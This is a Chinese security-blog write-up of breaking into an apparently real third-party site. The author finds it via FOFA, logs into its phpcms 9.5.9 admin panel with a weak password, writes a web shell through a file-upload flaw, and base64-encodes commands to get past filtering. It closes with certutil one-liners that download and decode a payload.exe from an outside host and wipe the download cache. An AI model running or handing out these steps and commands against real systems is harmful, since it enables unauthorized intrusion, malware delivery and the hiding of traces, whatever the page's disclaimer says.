记录一次从弱口令到远程登陆

admin

101400
文章

87
评论

2020年12月21日08:00:50评论109 views字数 1392阅读4分38秒阅读模式

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

所有话题标签：

#Web安全 #漏洞复现 #工具使用 #权限提升

#权限维持 #防护绕过 #内网安全 #实战案例

#其他笔记 #资源分享 #MSF

该目标起源于，通过fofa搜索“xx网络”，然后通过弱口令拿到了该后台权限，在后台发现这套系统为phpcms 9.5.9。

于是看看网上有没有历史漏洞，同时也问了一下好友@RG师傅，他找到一个历史漏洞文章：

https://www.cnblogs.com/str1ve/p/13381676.html

我们在用户->管理会员->添加会员模块中进行文件上传

这是a.txt的内容，通过file_put_contents进行文件写入

但是这样文件上传会有一个问题，就是他这里可能会拦截或者解析不到你的命令，只能解析phpinfo()

但是如果执行别的命令就不行，比如whoami

考虑把内容进行base64编码一下试试

然后执行命令，就没有报错了，我们执行命令也要记得base64编码一下

既然可以执行命令，我这里尝试了hta上线和powershell上线，可能因为机器是腾讯云的缘故给我拦截了，于是请教了3h师傅，他和我说可以使用Windows系统中的Certutil/Bitsadmin/Powershell等命令来下载文件，命令是3h师傅整理的，在这里贴出来。

Certutil：

%USERPROFILE%AppDataLocalLowMicrosoftCryptnetUrlCacheContent

下载文件：certutil -urlcache -split -f http://192.168.1.108/payload.exe C:ProgramDatapayload.execertutil -urlcache -split -f http://192.168.1.108/base64.txt b64 & certutil -decode b64 C:ProgramDatapayload.exe & del b64
删除指定缓存：certutil -urlcache -split -f http://192.168.1.108/base64.txt delete
查看所有缓存：certutil -urlcache *
删除所有缓存：certutil -urlcache * delete